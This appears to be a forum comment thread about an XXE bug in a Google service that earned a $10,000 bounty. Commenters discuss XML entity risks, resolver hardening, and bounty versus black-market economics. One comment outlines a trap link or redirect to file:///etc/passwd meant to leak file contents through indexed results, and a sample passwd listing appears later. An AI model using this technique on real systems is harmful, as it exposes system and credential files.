This is an examplary response from google. They respond promptly (with humor no less) and thank the guys that found the bug. Then they proceeded to pay out a bounty of $10.000.
Well done google.
Am I missing part of the story?
So anyone can create a trap link such as
<a href="file:///etc/passwd">gold</a>
Or <a href="trap.html">trap</a>
once trap.html is requested the server issues a header "Location: file:///etc/passwd"Then it's just a matter of seat and wait for the result to show up wherever that spider shows its indexed results.
This should scare anyone who has ever left an old side project running; I could see a lot of companies doing a product/service portfolio review based on this as a case study.
Even better, host on your competitor's servers.
Works for small, old, etc products as the value of breech will probably be less than value of bounty + cred.
They also discovered vulnerabilities in many big websites (dropbox, facebook, mega, ...). Their blog also has many great write-ups : http://blog.detectify.com/
It's too much hidden power in the hands of those who don't know what they're doing (loading external entities pointed in an XML automatically? what kind of joke is that?)
Your browser does much the same when parsing (X)HTML. LaTeX naturally includes ‘external’ resources when building an output file. There are tons of examples like that, loading external entities per se is not wrong, it’s mostly just wrong under these specific circumstances.
This compared to XML parsers, for which there are often multiple per language, each of which may be implemented to wildly different levels of sophistication re: security.
To quote Phil Wadler's paper about XML, where he established some of the principles that influenced Xquery: "So the essence of XML is this: the problem it solves is not hard, and it does not solve the problem well."[1]
I suggest reading the entire paper; It shows a number of shortcomings, but it's also rather enlightening about how XML actually is structured, and how its semantics are defined. (ie, in spite of that quote, it's not just XML bashing)
[1]http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.109...
What I don't agree is that it allows a "load this" where this can be a local file, an url in some cases, anything basically
Where would we be if web browsers couldn't use external resources?
General-purpose parsers/renderers need have tightly locked down, sensible defaults, or even security-oriented feature subsets, but that doesn't mean we should remove one of their most useful features altogether, or avoid them because they're powerful and dangerous.
XML - It seemed like a good idea at the time"XML is simply lisp done wrong." — Alan Cox
but the gee-whizzery won.
"XML combines the efficiency of text files with the readability of binary files" — unknown
"XML is a classic political compromise: it balances the needs of man and machine by being equally unreadable to both." — Matthew Might
Anyone remember XHTML ?
The pricing models has apparently worked so far. Are any active users of Detectify here and can share their experience?
Nice to know about such things :-)
Reading the spec. which led to the implementations, can often reveal interesting things, like support for external entities..
They could also provide a canned resolver which hits the local filesystem and/or the web, which programmers could supply if they wanted, but this should not be a default. The programmer should have to explicitly specify that access.
I've had related problems where XML parsers would try to go off and fetch DTDs from the web, then fail, because they were running on firewalled machines that couldn't see the servers hosting the DTDs. That took us by surprise. We installed an entity resolver that looked in a local cache of DTDs instead, which was fairly easy. But i would prefer not to have been surprised.
Also, all this stuff should be running in a jail where it can't even see any interesting files, of course.
Then the programmers would write their own resolvers with even more bugs most probably. You would have 10 000 broken implementations of that code, half of them copied from stackoverflow example with security left as exercise for reader.
But the number of times I've seen production apps that turn out to behind the scenes request DTD's or schemas from remote servers regularly have made that one of the first thing I check if I am tasked to maintain or look into anything that parses XML. Often these apps stop working or slow down for seemingly no reason because the DTD or schema becomes unavailable, and nobody understands why.
One really interesting aspect of this is that many applications suddenly broke when the Republicans shut down the government last year because a number of XML schemas are managed by government agencies who were suddenly legally unable to provide their normal web services:
http://gis.stackexchange.com/a/73777 http://forums.arcgis.com/threads/94294-Expected-DTD-markup-w... http://www.catalogingrules.com/?p=77
Makes me wonder whether it's time to start contributing patches to disable bad ideas like this by default — some places are clearly paying a significant amount to serve content nobody should need: http://www.w3.org/blog/systeam/2008/02/08/w3c_s_excessive_dt...
twic is right that one should always use entity resolvers that point to local ressources and that parsers should run in a sandbox without external access.
He's also right to say that by default parsers shouldn't go fetch external resources; I think the reason is historical; entity resolvers appeared later than the parsers themselves.
When I first noticed that HTML doctypes have URLs in them, I inquisitively tried accessing them, and it brought up a lot of questions in my mind about why it was designed that way, what would happen if the URLs no longer existed, etc. Such an explicit external dependency just didn't feel right to me. Unfortunately most people either don't notice or seem to ignore these things...
Interestingly enough, not all XML parsers support external entities; the first one to come to mind is this: http://tibleiz.net/asm-xml/introduction.html
Why would you write code to parse XML?
Use an existing parser to parse.
Use XSLT to modify/transform (including generate JSON/CSV/other).
XML is for some reason a super-controversial technology that is apparently almost universally hated, and XSLT even more so. I hope I'll not be downvoted even more by asking what's scary about being downstream from a (serious, well-maintained) XML parser?
(And I love XSLT. What can I say.)
Input from potentially malicious users should be in the simplest, least powerful of formats. No logic, no programability, strictly data.
I'm putting "using XML for user input" in same bucket as "rolling your own crypto/security system". That is you're gonna do it wrong, so don't do it.
Actually digged it when i read it a few years ago and awesome knowing that it was probably used for this reply :)
Owasp is also a good resource for learning: https://www.owasp.org/index.php/Main_Page
You can see the general payout levels here: http://www.google.com/about/appsecurity/reward-program/ , normally the top payout is about $ 20,000, but the top payout (for Chrome) currently 2 people have been rewarded with $ 60,000. There is an overview of the top payouts though: http://www.chromium.org/Home/chromium-security/hall-of-fame.
Some payouts are $1337 ,$3133.7 or $31336 :P
Microsoft rewards even up to $100.000 for security issues in the latest OS (currently Windows 8.1)
root:x:0:0:root:/:/bin/sh
bin:x:1:1:bin:/dev/null:/sbin/nologin
nobody:x:99:99:nobody:/dev/null:/sbin/nologin
app:x:100:100:app:/app:/bin/shThey were useful for document editing use cases - remember this was before SOAP and xml serialization, and sgml tooling that already supported this stuff existed. You can see the record of the decision here: http://www.w3.org/XML/9712-reports.html#ID5
Getting the source?
I guess it's possible you could find a computer that hosted both search and the codebase. But, since search is for external and the codebase is for internal, I'd be that they don't share clusters.
"Sir, I am sorry to inform you that another backdoor has been found. We will introduce two more as agreed upon in our service level agreement."
This sells for at least 10 times more on the black market. Why would one rationally chose to "sell" this to google instead of the black market.
Some people don't break the law because they are afraid to get caught, but I like to believe that most people don't break the law because of the moral aspect. To me at least, selling this on the black market poses no moral questions, so, leaving aside "I'm afraid to get caught", why would one not sell this on the black market? Simple economic analysis.
Very serious question.
* It fits into nobody's existing operational framework (no crime syndicate has a UI with a button labeled "read files off Google's prod servers")
* A single patch run by a single organization kills it entirely
* The odds of anyone, having extended access and pivoted into Google's data center, keeping that access is zero.
I'm not an authority on how much the black market values dumb web vulnerabilities but my guess on a black market price tag for this bug is "significantly less than Google paid".
Later: I asked a friend. "An XXE in a single property? Worthless. And at Google? Worth money to Google. Worth nothing to anybody else."
- How will you whitewash the money? Alternatively how will you spend them on the black market? You can't buy houses, cars or stocks with black money.
- Will you get paid? - Secure anonymous payments that are guaranteed are not trivial. I don't know if there are escrow services for the black market, but this is definitely risky. We are talking about shady actors after all.
- Will you get caught? If do you will probably end up in prison.
When you take the above in to consideration I think most people would prefer $10.000 legitimate US dollars without risk to $100.000 that might end up giving you ten years behind bars.
Mind you, your point is certainly valid if this were a random hacker type.
If you manage to sell this on the black market, that money is worth half when turned into "legit" money that you can spend. If we leave aside "I'm afraid to get caught" do we mean "caught by the justice system"? What would happen if you sell your exploit to some cybermob and a few days later, some monkey on a typewriter, finds your exact exploit and publishes it online? Not your problem it is worthless now and some mob feels you sold them crappy gear?
As for the moral aspect. Think of anyone you hold in high regard, or have a loving relationship with. Selling an exploit that will be used for harm, might mean harm to those you hold dear.
Then there is this simmering thing in your subconsciousness. Some know how to put out that fire. Others wake up in a sweat years later, after a dream where their exploit is used to find and execute a political dissident. That is: You may very well come to regret a "bad" deed in the future, when your situations and responsibilities change. You won't lie on your death bed and think: "I wish I hadn't build that school, but taken the money and put a down-payment on my new bathroom."
Because it is wrong to harm others for personal benefit?
In business morality is a luxury that some companies can't afford and most choose not to have so it shouldn't be expected.
The only thing preventing you from selling it on the black market is the potential fame and business you may get by being able to reveal your find which may or may not be worth it.
That 10k is not really much of an incentive from a business perspective.
But I agree with you that $10,000 doesn't sound like much, for such an exploit, and for a company like Google.
Edit: corrected typo "$10" -> $10k.
2. I'm assuming your basis for "no moral questions" is because you'd be hurting Google, which is a corporation, not a human, and can therefore be treated with a different set of moral values. (If this assumption is incorrect you need to clarify.) However, selling this exploit on the black market may very well be leveraged to affect a lot more people than just Google. People that will be phished, scammed and extorted. That (I hope) does pose moral questions, doesn't it?
The problem is, you can't sell an exploit on the black market on the condition that it may only be used to (say) "steal from the rich and incorporated".
3. Finally, $100k earned on the black market is not worth the same as if it was legitimate, because it is very hard to spend. I can imagine that a process of white-washing could easily knock 50% off the value, as well as taking a lot of time and effort. Then you got $50k, which is already a lot closer to $10k.
That's probably a reflection of your own morals. There are millions of people that could be affected by this bug, so I'm not sure how there isn't a moral question here.
Exactly because of that. One is legal the other is not
If they sold it on the black market, they couldn't brag to anyone that they hacked google.
You should include damage to the company's reputation, should this get leaked. Specially since they work with security - and who would trust their security to people who sell vulnerabilities to the highest bidder?
This could cost than much more than your quote.
As long as Google is willing to negotiate, I don't see a problem with a group being satisfied with 10k and taking it.
Bounties are always awarded after the bug is disclosed[1].
We constantly[2] upgrade the bounties whenever we feel like we should be paying more, and we will continue to do so. We also increase the rewards from the amounts in the price list if we think they result in a higher impact than what the reporter originally suspected.
We aren't actually trying to out-pay the black market. Overall, our goal is to reward the security community for their time and help for their security research, since we both have the same goal in common of keeping all of us safe (either Google services, or open source/popular software[3]).
And if you are interested, you can follow news on Google's VRP here: - https://plus.google.com/communities/103663928590757646624
[1] http://www.google.com/about/appsecurity/reward-program/ [2] - http://googleonlinesecurity.blogspot.com/2010/11/quick-updat... - http://googleonlinesecurity.blogspot.com/2010/11/rewarding-w... - http://googleonlinesecurity.blogspot.com/2012/02/celebrating... - http://googleonlinesecurity.blogspot.com/2012/04/spurring-mo... - http://googleonlinesecurity.blogspot.com/2013/08/security-re... - http://googleonlinesecurity.blogspot.com/2013/06/increased-r... - http://googleonlinesecurity.blogspot.com/2014/02/security-re... [3] - http://googleonlinesecurity.blogspot.com/2007/10/auditing-op... - http://googleonlinesecurity.blogspot.com/2011/08/fuzzing-at-... - http://googleonlinesecurity.blogspot.com/2013/10/going-beyon... - http://googleonlinesecurity.blogspot.com/2013/11/even-more-p... - http://googleonlinesecurity.blogspot.com/2014/01/ffmpeg-and-... - http://www.google.com/about/appsecurity/research/